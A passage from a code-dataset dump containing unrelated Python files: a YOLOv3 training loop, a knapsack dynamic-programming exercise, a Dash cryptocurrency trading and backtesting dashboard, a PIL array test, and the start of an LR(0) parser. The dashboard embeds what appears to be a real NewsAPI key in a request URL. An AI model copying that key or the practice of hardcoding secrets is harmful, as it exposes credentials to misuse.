|grep -A4 GPU|grep Free', stdout=subprocess.PIPE,\n shell=True).communicate()[0]\n output = output.decode(\"ascii\")\n # assumes that it is on the popiah server and the last gpu is not used\n memory_available = [int(x.split()[2]) for x in output.split(\"\\n\")[:-2]]\n if not memory_available:\n return\n print(\"Setting GPU to use to PID {}\".format(np.argmax(memory_available)))\n return np.argmax(memory_available)\n\n\ndef set_one_gpu():\n\n gpu = FLAGS.gpu\n if not gpu:\n gpu = str(get_free_gpu())\n\n if not gpu:\n return\n\n print(\"Using GPU: %s\" % gpu)\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\" # see issue #152\n os.environ['CUDA_VISIBLE_DEVICES'] = gpu\n\n\ndef main(_argv):\n set_one_gpu()\n\n if FLAGS.tiny:\n model = YoloV3Tiny(FLAGS.size, training=True,\n classes=FLAGS.num_classes)\n anchors = yolo_tiny_anchors\n anchor_masks = yolo_tiny_anchor_masks\n else:\n model = YoloV3(FLAGS.size, training=True, classes=FLAGS.num_classes)\n anchors = yolo_anchors\n anchor_masks = yolo_anchor_masks\n\n # train_dataset = dataset.load_fake_dataset()\n dataset_name = 'data/' + FLAGS.dataset + '.train.record'\n val_dataset_name = 'data/' + FLAGS.dataset + '.val.record'\n\n train_dataset = dataset.load_tfrecord_dataset(\n dataset_name, FLAGS.classes)\n train_dataset = train_dataset.shuffle(buffer_size=1024) # TODO: not 1024\n train_dataset = train_dataset.batch(FLAGS.batch_size)\n train_dataset = train_dataset.map(lambda x, y: (\n dataset.transform_images(x, FLAGS.size),\n dataset.transform_targets(y, anchors, anchor_masks, 80)))\n train_dataset = train_dataset.prefetch(\n buffer_size=tf.data.experimental.AUTOTUNE)\n\n tf_name = FLAGS.name\n if not tf_name:\n tf_name = 'train' + FLAGS.gpu\n best_tf_name = \"checkpoints/%s_best.tf\" % tf_name\n last_tf_name = \"checkpoints/%s_last.tf\" % tf_name\n\n # val_dataset = dataset.load_fake_dataset()\n val_dataset = dataset.load_tfrecord_dataset(\n val_dataset_name, FLAGS.classes)\n val_dataset = val_dataset.batch(FLAGS.batch_size)\n val_dataset = val_dataset.map(lambda x, y: (\n dataset.transform_images(x, FLAGS.size),\n dataset.transform_targets(y, anchors, anchor_masks, 80)))\n\n if FLAGS.transfer != 'none':\n model.load_weights(FLAGS.weights)\n if FLAGS.transfer == 'fine_tune':\n # freeze darknet\n darknet = model.get_layer('yolo_darknet')\n freeze_all(darknet)\n elif FLAGS.transfer == 'frozen':\n # freeze everything\n freeze_all(model)\n else:\n # reset top layers\n if FLAGS.tiny: # get initial weights\n 
init_model = YoloV3Tiny(\n FLAGS.size, training=True, classes=FLAGS.num_classes)\n else:\n init_model = YoloV3(\n FLAGS.size, training=True, classes=FLAGS.num_classes)\n\n if FLAGS.transfer == 'darknet':\n for l in model.layers:\n if l.name != 'yolo_darknet' and l.name.startswith('yolo_'):\n l.set_weights(init_model.get_layer(\n l.name).get_weights())\n else:\n freeze_all(l)\n elif FLAGS.transfer == 'no_output':\n for l in model.layers:\n if l.name.startswith('yolo_output'):\n l.set_weights(init_model.get_layer(\n l.name).get_weights())\n else:\n freeze_all(l)\n\n optimizer = tf.keras.optimizers.Adam(lr=FLAGS.learning_rate)\n loss = [YoloLoss(anchors[mask], classes=FLAGS.num_classes)\n for mask in anchor_masks]\n best_val_loss = 0\n history = None\n\n if FLAGS.mode == 'eager_tf':\n # Eager mode is great for debugging\n # Non eager graph mode is recommended for real training\n avg_loss = tf.keras.metrics.Mean('loss', dtype=tf.float32)\n avg_val_loss = tf.keras.metrics.Mean('val_loss', dtype=tf.float32)\n\n for epoch in range(1, FLAGS.epochs + 1):\n for batch, (images, labels) in enumerate(train_dataset):\n with tf.GradientTape() as tape:\n outputs = model(images, training=True)\n regularization_loss = tf.reduce_sum(model.losses)\n pred_loss = []\n for output, label, loss_fn in zip(outputs, labels, loss):\n pred_loss.append(loss_fn(label, output))\n total_loss = tf.reduce_sum(pred_loss) + regularization_loss\n\n grads = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(\n zip(grads, model.trainable_variables))\n\n # logging.info(\"{}_train_{}, {}, {}\".format(\n # epoch, batch, total_loss.numpy(),\n # list(map(lambda x: np.sum(x.numpy()), pred_loss))))\n avg_loss.update_state(total_loss)\n\n for batch, (images, labels) in enumerate(val_dataset):\n outputs = model(images)\n regularization_loss = tf.reduce_sum(model.losses)\n pred_loss = []\n for output, label, loss_fn in zip(outputs, labels, loss):\n pred_loss.append(loss_fn(label, output))\n total_loss = tf.reduce_sum(pred_loss) + regularization_loss\n\n # logging.info(\"{}_val_{}, {}, {}\".format(\n # epoch, batch, total_loss.numpy(),\n # list(map(lambda x: np.sum(x.numpy()), pred_loss))))\n avg_val_loss.update_state(total_loss)\n\n val_lost = avg_val_loss.result().numpy()\n logging.info(\"{}, train: {}, val: {}\".format(\n epoch,\n avg_loss.result().numpy(),\n val_lost))\n\n avg_loss.reset_states()\n avg_val_loss.reset_states()\n model.save_weights(last_tf_name)\n if best_val_loss == 0 or best_val_loss > val_lost:\n best_val_loss = val_lost\n logging.info(\"saving best val loss: %s\" % best_tf_name)\n model.save_weights(best_tf_name)\n else:\n model.compile(optimizer=optimizer, loss=loss,\n run_eagerly=(FLAGS.mode == 'eager_fit'))\n\n callbacks = [\n ReduceLROnPlateau(verbose=1),\n EarlyStopping(patience=3, verbose=1),\n ModelCheckpoint(best_tf_name,\n verbose=1, save_weights_only=True),\n TensorBoard(log_dir='logs')\n ]\n\n history = model.fit(train_dataset,\n epochs=FLAGS.epochs,\n callbacks=callbacks,\n validation_data=val_dataset)\n\n if history is not None:\n print(history.history['val_loss'])\n best_val_loss = min(history.history['val_loss'])\n model.save_weights(best_tf_name)\n\n print(\"Best weights are saved as %s\" % best_tf_name)\n tiny = 'tiny_' if FLAGS.tiny else ''\n out_name = \"%s_d%s_%sm%s_bs%d_s%s_e%d_val%d\" % \\\n (tf_name, FLAGS.dataset, tiny, FLAGS.transfer, FLAGS.batch_size, FLAGS.size, FLAGS.epochs, best_val_loss)\n mfn = \"data/model/%s/\" % out_name\n\n final_tf_name = \"%s.tf\" % 
out_name\n copy_tf(\"%s_best.tf\" % tf_name, final_tf_name)\n print(\"Final checkpoint file saved as: %s\" % final_tf_name)\n model.load_weights(best_tf_name)\n tf.saved_model.save(model, mfn)\n print(\"Model file saved to: %s\" % mfn)\n\n\ndef copy_tf(ifn, ofn):\n for fn in os.listdir('checkpoints'):\n if not fn.startswith(ifn):\n continue\n out = fn.replace(ifn, ofn)\n shutil.copyfile('checkpoints/' + fn, 'checkpoints/' + out)\n\nif __name__ == '__main__':\n try:\n app.run(main)\n except SystemExit:\n pass\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"61326514","text":"''' Problem Statement-: You have M questions and N seconds to complete a test.\n Each question has some points and takes some time to solve (which will be given as input).\n Find the maximum mark that can be scored by the student within the given time N.\n\nSample test case:\n\n4 // number of questions\n10 // Total time to attend the test\n1 2 // one mark question – 2 seconds to solve.\n2 3 // two mark question – 3 seconds to solve.\n3 5 // three mark question – 5 seconds to solve.\n4 7 // 4 mark question – 7 seconds to solve.\n'''\nt=[[-1 for j in range(1001)] for i in range(1001)]\ndef maxMarks(val,wt,n,w):\n if n==0 or w==0:\n return 0\n if t[n][w]!=-1:\n return t[n][w]\n if wt[n-1]<=w:\n t[n][w]= max(val[n-1]+maxMarks(val,wt,n-1,w-wt[n-1]), maxMarks(val,wt,n-1,w))\n return t[n][w]\n else:\n t[n][w]= maxMarks(val,wt,n-1,w)\n return t[n][w]\n\n\n\n\nval=[1,2,3,4]\nwt= [2,3,5,7]\nw=10\nn=len(wt)\n\nprint(maxMarks(val,wt,n,w))\n\n","sub_path":"Dynamic Programming/TCS_Digital_questions.py","file_name":"TCS_Digital_questions.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"427555842","text":"import os\nimport pathlib\nimport json\nimport base64\nimport datetime\nimport requests\nimport pathlib\nimport math\nimport pandas as pd\nimport flask\n\nimport plotly.graph_objs as go\nfrom plotly import tools\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport dash_table\nimport dash_daq as daq\nimport ccxt\nimport crypto_stream\nfrom dash.exceptions import PreventUpdate\nimport models\nimport time\nimport backtesting\nimport dash_table.FormatTemplate as FormatTemplate\ncrypto_stream.init_connection()\n\nserver = flask.Flask(__name__)\n\napp = dash.Dash(\n __name__,\n server=server,\n meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=1\"}],\n)\n\napp.config[\"suppress_callback_exceptions\"] = True\n\nAPP_PATH = str(pathlib.Path(__file__).parent.resolve())\nSTREAM_TABLE = dict(id='stream-table',data=[{'close':0.0, \n \"balance\": 10000, \n \"shares\": 0, \n 'status':''}\n ],\n columns=[{'id':'close', 'name':'Close'},\n {'id':'balance', 'name':'Balance'},\n {'id':'shares', 'name':'Shares'},\n {'id':'status', 'name':'Status'}])\ncolumns=[\n 'Stock', \n 'Entry Date', \n 'Exit Date', \n 'Shares', \n 'Entry Share Price', \n 'Exit Share Price', \n 'Entry Portfolio Holding', \n 'Exit Portfolio Holding', \n 'Profit/Loss']\n#dict(id='trade-metric-table',data=[],columns=[{'id':col, 'name':col} for col in columns])\nTRADE_METRIC_TABLE = dict(id='trade-metric-table', data=[], \n columns=[{'id':'Stock', 'name':'Stock'},\n {'id':'Entry Date', 'name':'Entry Date', 'type': 
'datetime'},\n {'id':'Exit Date', 'name':'Exit Date', 'type': 'datetime'},\n {'id':'Shares', 'name':'Shares'},\n {'id':'Entry Share Price', 'name':'Entry Share Price', 'type':'numeric','format': FormatTemplate.money(2)},\n {'id':'Exit Share Price', 'name':'Exit Share Price','type':'numeric','format': FormatTemplate.money(2)},\n {'id':'Entry Portfolio Holding', 'name':'Entry Portfolio Holding', 'type':'numeric','format': FormatTemplate.money(2)},\n {'id':'Exit Portfolio Holding', 'name':'Exit Portfolio Holding', 'type':'numeric','format': FormatTemplate.money(2)},\n {'id':'Profit/Loss', 'name':'Profit/Loss', 'type':'numeric','format': FormatTemplate.money(2)}])\n\n\n# API Requests for news div\nnews_requests = requests.get(\n \"https://newsapi.org/v2/top-headlines?sources=bbc-news&apiKey=da8e2e705b914f9f86ed2e9692e66012\"\n)\n\n# API Call to update news\ndef update_news():\n json_data = news_requests.json()[\"articles\"]\n df = pd.DataFrame(json_data)\n df = pd.DataFrame(df[[\"title\", \"url\"]])\n max_rows = 10\n return html.Div(\n children=[\n html.P(className=\"p-news\", children=\"Headlines\"),\n html.P(\n className=\"p-news float-right\",\n children=\"Last update : \"\n + datetime.datetime.now().strftime(\"%H:%M:%S\"),\n ),\n html.Table(\n className=\"table-news\",\n children=[\n html.Tr(\n children=[\n html.Td(\n children=[\n html.A(\n className=\"td-link\",\n children=df.iloc[i][\"title\"],\n href=df.iloc[i][\"url\"],\n target=\"_blank\",\n )\n ]\n )\n ]\n )\n for i in range(min(len(df), max_rows))\n ],\n ),\n ]\n )\n\n# MAIN CHART TRACES (STYLE tab)\ndef line_trace(df, y_col, color='rgb(244, 212, 77)'):\n trace = go.Scatter(\n x=df.index, \n y=df[y_col], \n mode=\"lines\", \n showlegend=False, \n name=y_col,\n line=dict(color=color)\n )\n return trace\n\ndef marker_trace(x_data, y_data, symbol, color, name, marker_size=15):\n trace = go.Scatter(\n x=x_data, \n y=y_data, \n mode=\"markers\", \n showlegend=False, \n marker_size=marker_size,\n marker_symbol=symbol,\n marker_color=color,\n name=name\n )\n return trace\n\ndef bar_trace(df, y_col):\n return go.Ohlc(\n x=df.index,\n open=df[y_col],\n increasing=dict(line=dict(color=\"#888888\")),\n decreasing=dict(line=dict(color=\"#888888\")),\n showlegend=False,\n name=\"bar\",\n )\ndef colored_bar_trace(df):\n return go.Ohlc(\n x=df.index,\n open=df[\"open\"],\n high=df[\"high\"],\n low=df[\"low\"],\n close=df[\"close\"],\n showlegend=False,\n name=\"colored bar\",\n )\n\ndef candlestick_trace(df, col):\n return go.Candlestick(\n x=df.index,\n open=df[\"open\"],\n high=df[\"high\"],\n low=df[\"low\"],\n close=df[\"close\"],\n increasing=dict(line=dict(color=\"#00ff00\")),\n decreasing=dict(line=dict(color=\"white\")),\n showlegend=False,\n name=\"candlestick\",\n )\n\ndef get_fig_layout(tickformat=\"%H:%M:%S\"):\n layout = dict(margin=dict(t=40),\n hovermode=\"closest\",\n #uirevision=True,\n height=350,\n paper_bgcolor=\"rgba(0,0,0,0)\",\n plot_bgcolor=\"rgba(0,0,0,0)\",\n legend={\"font\": {\"color\": \"darkgray\"}, \"orientation\": \"h\", \"x\": 0, \"y\": 1.1},\n font={\"color\": \"darkgray\"},\n showlegend=True,\n xaxis={\n \"zeroline\": False,\n \"showgrid\": False,\n \"title\": \"Closing Price\",\n \"showline\": False,\n #\"domain\": [0, 0.8],\n \"tickformat\" : tickformat,\n \"titlefont\": {\"color\": \"darkgray\"},\n },\n yaxis={\n \"title\": 'Time',\n \"showgrid\": False,\n \"showline\": False,\n \"zeroline\": False,\n \"autorange\": True,\n \"titlefont\": {\"color\": \"darkgray\"},\n },xaxis2={\n \"title\": \"Time\",\n 
#\"domain\": [0.8, 1], # 70 to 100 % of width\n \"titlefont\": {\"color\": \"darkgray\"},\n \"showgrid\": False,\n },\n yaxis2={\n \"anchor\": \"free\",\n \"overlaying\": \"y\",\n \"side\": \"right\",\n \"showticklabels\": False,\n \"titlefont\": {\"color\": \"darkgray\"},\n },\n )\n return layout\n \ndef generate_section_banner(title):\n return html.Div(className=\"section-banner\", children=title)\n\ndef get_close_fig(df):\n # Add main trace (style) to figure\n '''fig = make_subplots(\n rows=1,\n shared_xaxes=True,\n shared_yaxes=True,\n cols=1,\n print_grid=False,\n vertical_spacing=0.12,\n )\n fig.append_trace(line_trace(df), 1, 1)\n fig.append_trace(bar_trace(df), 2, 1)'''\n fig = go.Figure()\n fig.add_traces([line_trace(df, 'close')])\n fig[\"layout\"] = get_fig_layout()\n return fig\n \n\ndef get_sma_fig(df):\n fig = go.Figure()\n entry_df = df.loc[df[\"entry/exit\"] == 1.0]\n exit_df = df.loc[df[\"entry/exit\"] == -1.0]\n entry_marker = marker_trace(entry_df.index, \n entry_df.sma10, \n 'triangle-up', '#0efa0a', 'buy')\n exit_marker = marker_trace(exit_df.index, \n exit_df.sma10, \n 'triangle-down', '#FF0000', 'sell')\n fig.add_traces([line_trace(df, 'sma10', '#fa760a'), \n line_trace(df, 'sma20', '#0af7f7'), \n entry_marker, \n exit_marker])\n fig[\"layout\"] = get_fig_layout()\n return fig\n\n\ndef get_trade_fig(df):\n fig = go.Figure()\n fig.add_traces([line_trace(df, 'entry/exit')])\n fig[\"layout\"] = get_fig_layout()\n return fig\n\ndef get_backtest_fig(df, timeframe):\n fig = go.Figure()\n tickformat = {}\n if (timeframe in ['30m','1h','1d','1w']):\n tickformat = {'tickformat':'%Y-%m-%d'}\n entry_df = df.loc[df[\"Entry/Exit\"] == 1.0]\n exit_df = df.loc[df[\"Entry/Exit\"] == -1.0]\n entry_marker = marker_trace(entry_df.index, \n entry_df['Portfolio Total'], \n 'circle', '#15ed24', 'buy', 10)\n exit_marker = marker_trace(exit_df.index, \n exit_df['Portfolio Total'], \n 'circle', '#ed1f3f', 'sell', 8)\n fig.add_traces([line_trace(df, 'Portfolio Total', '#b2c2c0'), \n entry_marker, \n exit_marker])\n fig[\"layout\"] = get_fig_layout(**tickformat)\n return fig\n\n\n\n'''\nCallbacks starts\n'''\n\n#app.config.suppress_callback_exceptions = True\n@app.callback([Output('crypto-2-symbol', 'data'),\n Output('two-sec-interval', 'disabled'),\n Output('five-sec-interval', 'disabled')],\n [Input('trade-btn', 'n_clicks')],\n [State('crypto-2-select-dropdown', 'value'),\n State('trade-model-select-dropdown', 'value')])\ndef reinitalize_crypto(n_clicks, crypto, model):\n if(crypto==None or crypto==''):\n raise PreventUpdate\n crypto_stream.init_connection()\n #data = [{'close':0.0, \"balance\": 10000, \"shares\": 0, 'status':''}]\n return crypto, False, False\n\n@app.callback(Output('live-crypto-graph', 'figure'),\n [Input('two-sec-interval', 'n_intervals')],\n [State('crypto-2-symbol', 'data')])\ndef update_close_scatter(n, crypto):\n df = crypto_stream.fetch_data(crypto)\n return get_close_fig(df)\n\n\n@app.callback([Output('stream-table', 'data'),\n Output('entry-exit-dict', 'data'),\n Output('live-trade-graph', 'figure'),\n Output('live-signal-graph', 'figure')],\n [Input('five-sec-interval', 'n_intervals')],\n [State('stream-table', 'data'),\n State('entry-exit-dict', 'data'),\n State('trade-model-select-dropdown', 'value')])\ndef execute_trade(n_intervals, buy_sell_data, entry_exit_df, model):\n if entry_exit_df:\n entry_exit_df = pd.DataFrame.from_dict(entry_exit_df)\n is_sma = (model=='SMA10')\n entry_exit_df = crypto_stream.generate_signals(crypto_stream.get_data_from_table())\n if 
not is_sma and len(entry_exit_df)>20:\n entry_exit_df = models.predict(entry_exit_df, model, 20)\n if len(entry_exit_df)<10: \n raise PreventUpdate\n else:\n account= buy_sell_data[-1]\n account = crypto_stream.execute_trade_strategy(entry_exit_df, account)\n print(account)\n if account:\n buy_sell_data.append(account)\n return buy_sell_data, entry_exit_df.to_dict('series'), get_trade_fig(entry_exit_df), get_sma_fig(entry_exit_df)\n\n@app.callback([Output(\"loading-output-1\", \"children\"),\n Output('backtesting-results-container', 'style'),\n Output('crypto-1-symbol', 'data'),\n Output('trade-metric-table', 'data'),\n Output('backtesting-graph', 'figure'),\n Output('eval_metric_table', 'data')],\n [Input('backtest-btn', 'n_clicks')],\n [State('crypto-1-select-dropdown', 'value'),\n State('model-select-dropdown', 'value'),\n State('timeframe-select-dropdown', 'value'),\n State('initial-capital-input', 'value'),\n State('no-of-shares-input', 'value')])\ndef reinitalize_model(n_clicks, crypto, model_name, timeframe, initial_capital, no_of_shares):\n portfolio_metrics, trade_metrics, portfolio_evaluation = backtesting.main(crypto, model_name, timeframe, initial_capital, no_of_shares)\n return '', {'display':'block'},crypto, trade_metrics.to_dict(\"rows\"), get_backtest_fig(portfolio_metrics, timeframe), portfolio_evaluation.reset_index().to_dict(\"rows\")\n\n\n'''\nCallbacks ends\n'''\n\ndef get_data_table(table_info):\n return dash_table.DataTable(\n id=table_info['id'],\n style_header={\"fontWeight\": \"bold\", \"color\": \"inherit\"},\n style_as_list_view=True,\n fill_width=True,\n style_cell={\n \"backgroundColor\": \"#1e2130\",\n \"fontFamily\": \"Open Sans\",\n \"padding\": \"0 2rem\",\n \"color\": \"darkgray\",\n \"border\": \"none\",\n },\n css=[\n {\"selector\": \"tr:hover td\", \n \"rule\": \"color: #91dfd2 !important;\"},\n {\"selector\": \"tr:last-child\", \n \"rule\": \"display:none !important;\"},\n {\"selector\": \"td\", \n \"rule\": \"border: none !important;\"},\n {\"selector\": \".dash-cell.focused\",\"rule\": \n \"background-color: #1e2130 !important;\",\n },\n {\"selector\": \"table\", \n \"rule\": \"--accent: #1e2130;\"},\n {\"selector\": \"tr\", \n \"rule\": \"background-color: transparent\"},\n ],\n data=table_info['data'],\n columns=table_info['columns'])\n\ndef get_evaluation_metrics_table(data=[]):\n return dash_table.DataTable(\n id='eval_metric_table',\n style_header={\"fontWeight\": \"bold\", \"color\": \"inherit\"},\n style_as_list_view=True,\n fill_width=True,\n style_cell_conditional=[\n {\"if\": {\"column_id\": \"Specs\"}, \"textAlign\": \"left\"}\n ],\n style_cell={\n \"backgroundColor\": \"#1e2130\",\n \"fontFamily\": \"Open Sans\",\n \"padding\": \"0 2rem\",\n \"color\": \"darkgray\",\n \"border\": \"none\",\n },\n css=[\n {\"selector\": \"tr:hover td\", \"rule\": \"color: #91dfd2 !important;\"},\n {\"selector\": \"td\", \"rule\": \"border: none !important;\"},\n {\n \"selector\": \".dash-cell.focused\",\n \"rule\": \"background-color: #1e2130 !important;\",\n },\n {\"selector\": \"table\", \"rule\": \"--accent: #1e2130;\"},\n {\"selector\": \"tr\", \"rule\": \"background-color: transparent\"},\n ],\n data=data,#new_df.to_dict(\"rows\"),\n columns=[{\"id\": c, \"name\": c} for c in [\"Metrics\", \"Backtest\"]],\n )\n\ndef get_btn_div(id_btn, btn_name):\n return html.Div(\n children=[html.Button(\n btn_name,\n id=f\"{id_btn}-btn\",\n n_clicks=0\n )])\ndef get_dropdown(id_name, data_list, value, title):\n return html.Div(\n id=f\"{id_name}-select-menu\",\n # 
className='five columns',\n children=[\n html.Label(id=f\"{id_name}-select-title\", children=f\"{title}\"),\n dcc.Dropdown(\n id=f\"{id_name}-select-dropdown\",\n options=list(\n {\"label\": data, \"value\": data} for data in data_list\n ),\n value=value,\n )])\n\ndef get_numeric_input(id_name, value, title):\n return html.Div(\n id=f\"{id_name}-menu\",\n # className='five columns',\n children=[\n html.Label(id=f\"{id_name}-title\", children=title),\n daq.NumericInput(\n id=f\"{id_name}-input\", className=\"setting-input\", value=value, size=200, max=9999999\n)])\n \ndef build_trade_panel():\n return html.Div(\n id=\"top-section-container\",\n className=\"row\",\n children=[\n dcc.Store(id='crypto-2-symbol', storage_type='local', data=crypto_stream.SYMBOL),\n dcc.Store(id='entry-exit-dict'),\n # Metrics summary\n html.Div(\n id=\"live-data-streaming\",\n className=\"eight columns\",\n children=[\n generate_section_banner(\"Closing Price\"),\n dcc.Graph(id='live-crypto-graph'),\n generate_section_banner(\"Signals\"),\n dcc.Graph(id='live-signal-graph'),\n generate_section_banner(\"Trade\"),\n dcc.Graph(id='live-trade-graph', figure={'layout':get_fig_layout()})\n ],\n ),\n # Piechart\n html.Div(\n id=\"trade-table\",\n className=\"four columns\",\n children=[\n html.Br(),\n get_dropdown('crypto-2', crypto_stream.get_crypto_symbols(), '', 'Crypto'),\n html.Br(),\n get_dropdown('trade-model', models.MODEL_LIST , models.MODEL_LIST[0], 'Model'),\n html.Br(),\n get_btn_div('trade', 'Trade'),\n html.Br(),\n #get_crypto_dropdown('crypto-2'),\n generate_section_banner(\"Trade Data\"),\n get_data_table(STREAM_TABLE)\n ],\n ),\n ],\n )\n\n\ndef build_backtesting_panel():\n return html.Div([\n # Manually select metrics\n html.Div(\n id=\"set-specs-intro-container\",\n # className='twelve columns',\n children=html.P(\n \"Use Backtesting, to evaluate the effectiveness of a AI model by running the strategy against historical data \"\n )\n ),\n html.Div(\n id=\"settings-menu\",\n children=[\n dcc.Store(id='crypto-1-symbol', storage_type='local', data=crypto_stream.SYMBOL),\n html.Div(\n id=\"backtesting-settings\",\n className=\"five columns\",\n children=[\n html.Div(\n className=\"six columns\",\n children=[\n html.Br(),\n get_dropdown('crypto-1', crypto_stream.get_crypto_symbols(), crypto_stream.SYMBOL, 'Crypto'),\n #get_crypto_dropdown('crypto-1'),\n html.Br(),\n get_dropdown('model', backtesting.model_list(), backtesting.model_list()[0], 'Model'),\n html.Br(),\n get_numeric_input('no-of-shares', 10, 'No of Shares')\n ]\n ),\n html.Div(\n className=\"six columns\",\n children=[\n html.Br(),\n get_dropdown('timeframe', ['1m', '5m', '30m', '1h', '1d','1w'], '1m', 'Interval'),\n html.Br(),\n get_numeric_input('initial-capital', 100000.0, 'Initial Capital'),\n html.Br(),\n html.Br(),\n get_btn_div('backtest', 'Backtest'),\n html.Br(),\n \n ]\n )\n ]),\n html.Div(\n id='loading-div',\n className=\"one columns\",\n children=[\n html.Br(),\n html.Br(),\n html.Div(\n className='ten rows',\n children=[dcc.Loading(\n id=\"loading-1\",\n type=\"default\",\n children=html.Div(id=\"loading-output-1\")\n )\n ]\n ),\n html.Br(),\n ]\n ),\n html.Div(\n id=\"backtesting-metrics\",\n className=\"six columns\",\n children=[\n generate_section_banner(\"Portfolio Evaluation Metrics\"),\n html.Br(),\n get_evaluation_metrics_table()\n ]\n )\n ]\n\n ),\n html.Div(\n id=\"backtesting-results-container\",\n style={\"display\": \"none\"},\n className='twelve columns',\n children=[\n html.Br(),\n generate_section_banner(\" 
Trading Strategy vs. Backtest Results\"),\n dcc.Graph(id='backtesting-graph'),\n html.Br(),\n generate_section_banner(\"Trade Evaluation Metrics\"),\n html.Br(),\n html.Div(id=\"portfolio-metric-panel\", children=[get_data_table(TRADE_METRIC_TABLE),\n ],\n ),\n ])])\n\n\ndef build_tabs():\n return html.Div(\n id=\"tabs\",\n className=\"tabs\",\n children=[\n dcc.Tabs(\n id=\"app-tabs\",\n value=\"tab1\",\n className=\"custom-tabs\",\n children=[\n dcc.Tab(\n id=\"Specs-tab\",\n label=\"Model Backtesting\",\n value=\"tab1\",\n className=\"custom-tab\",\n selected_className=\"custom-tab--selected\",\n children=build_backtesting_panel()\n ),\n dcc.Tab(\n id=\"Control-chart-tab\",\n label=\"Control Charts Dashboard\",\n value=\"tab2\",\n className=\"custom-tab\",\n selected_className=\"custom-tab--selected\",\n children=build_trade_panel()\n ),\n ],\n )\n ],\n )\n\n\ndef build_banner():\n return html.Div(\n id=\"banner\",\n className=\"banner\",\n children=[\n html.Div(\n id=\"banner-text\",\n children=[\n html.H5(\"Mind Bot\"),\n html.H6(\"An Automated program that buy and sell cryptocurrencies at the right time\"),\n ],\n ),\n html.Div(\n id=\"banner-logo\",\n children=[\n #html.Button(id=\"learn-more-button\", children=\"LEARN MORE\", n_clicks=0),\n html.Img(id=\"logo\", src=app.get_asset_url(\"dash-new-logo.png\")),\n ],\n ),\n ],\n )\n\n\n\n\napp.layout = html.Div(\n id=\"big-app-container\",\n children=[\n build_banner(),\n # Interval component for live clock\n dcc.Interval(id=\"two-sec-interval-sma\", disabled=True, interval=1 * 1000, n_intervals=0),\n dcc.Interval(id=\"two-sec-interval\", disabled=True, interval=1 * 1000, n_intervals=0),\n dcc.Interval(id=\"five-sec-interval\", disabled=True, interval=1 * 1000, n_intervals=0),\n dcc.Interval(\n id=\"interval-component\",\n interval=2 * 1000, # in milliseconds\n n_intervals=50, # start at batch 50\n disabled=True,\n ),\n html.Div(\n id=\"app-container\",\n children=[\n build_tabs(),\n # Main app\n html.Div(id=\"app-content\"),\n ],\n )\n ],\n)\n\n\n\n# Running the server\nif __name__ == \"__main__\":\n #app.run_server(debug=True, port=8050)\n app.run_server()\n ","sub_path":".ipynb_checkpoints/app-checkpoint.py","file_name":"app-checkpoint.py","file_ext":"py","file_size_in_byte":23632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"248900312","text":"from PIL import Image\nimport numpy as np\nimport os\n\nimg_path = \"./test.png\"\n\nimg = Image.open(img_path)\nprint('img: ',img)\n\nimg_numpy = np.array(img)\nprint('img_numpy.shape: ',img_numpy.shape)\nimg_transpose = img_numpy.transpose(2,1,0)\nprint('img_transpose.shape: ',img_transpose.shape)\n\nimg_transpose.flags.writeable = True\n\nimg = Image.fromarray(img_transpose,mode ='RGB') # mode is necessary\nprint('img: ',type(img))\n\n\n\n","sub_path":"t0115_numpy_Image.py","file_name":"t0115_numpy_Image.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403938247","text":"class Parser:\n \"\"\"\n The LR(0) parser algorithm.\n \"\"\"\n\n def __init__(self, grammar):\n self.grammar = grammar\n self.workingStack = []\n self.inputStack = []\n self.output = []\n\n def closure(self, productions):\n \"\"\"\n Constructs one clojure of the canonical collections.\n Takes a state containing productions.\n :param productions: List of productions for closure\n :return: a state. 
List of tuples\n [('S1', ['.', 'S']), ('S', ['.', 'aA']), ('S', ['.', 'bB'])],\n \"\"\"\n if not productions:\n return None\n closure = productions\n done = False\n while not done:\n done = True\n # Iterate each production in the state/clojure\n for dotted_prod in closure:\n dot_index = dotted_prod[1].index('.') # where is dot in rhs\n alpha = dotted_prod[1][:dot_index] # what is left of the dot\n b_beta = dotted_prod[1][dot_index + 1:] # what is right of the dot\n\n # If nothing after dot, then is final state\n if len(b_beta) == 0:\n continue\n\n B = b_beta[0]\n if B in self.grammar.E:\n continue\n for prod in self.grammar.get_productions(B):\n # adds item formed from production with dot in front of rhs of the production\n dotted_prod = (B, ['.'] + prod)\n if dotted_prod not in closure:\n closure += [dotted_prod]\n done = False\n return closure\n\n def go_to(self, state, symbol):\n \"\"\"\n Transition from a state to another using a terminal or non-terminal.\n Used in generating parsing table and the canonical collection.\n :param state: String\n :param symbol: String\n :return: a state, list of tuples\n \"\"\"\n C = []\n # in state search for LR(0) item that has dot in front of symbol\n for production in state:\n dot_index = production[1].index('.')\n alpha = production[1][:dot_index]\n xbeta = production[1][dot_index + 1:]\n if len(xbeta) == 0:\n continue\n X, beta = xbeta[0], xbeta[1:]\n if X == symbol:\n # move the dot after the symbol\n res = alpha + [X] + ['.'] + beta\n result_prod = (production[0], res)\n C += [result_prod]\n # call closure on this new item\n return self.closure(C)\n\n def get_canonical_collection(self):\n \"\"\"\n Constructs set of states.\n C - canonical collection\n ex: [\n [('S1', ['.', 'S']), ('S', ['.', 'aA']), ('S', ['.', 'bB'])],\n [('S1', ['S', '.'])],\n ...\n ]\n :return: Collection of states\n \"\"\"\n C = [self.closure([('S1', ['.', self.grammar.S[0]])])] # augment the grammar\n finished = False\n while not finished: # while we add a new state to the collection\n finished = True\n for state in C:\n for symbol in self.grammar.N + self.grammar.E:\n next_state = self.go_to(state, symbol)\n if next_state is not None and next_state not in C:\n C += [next_state]\n finished = False\n return C\n\n def generate_table(self):\n \"\"\"\n Generates the parsing table used to check the input tokens.\n A dictionary for each state I ~ the rows\n :return: parsing table. List of dictionaries containing action and maybe non/terminals\n [{'action': 'shift', 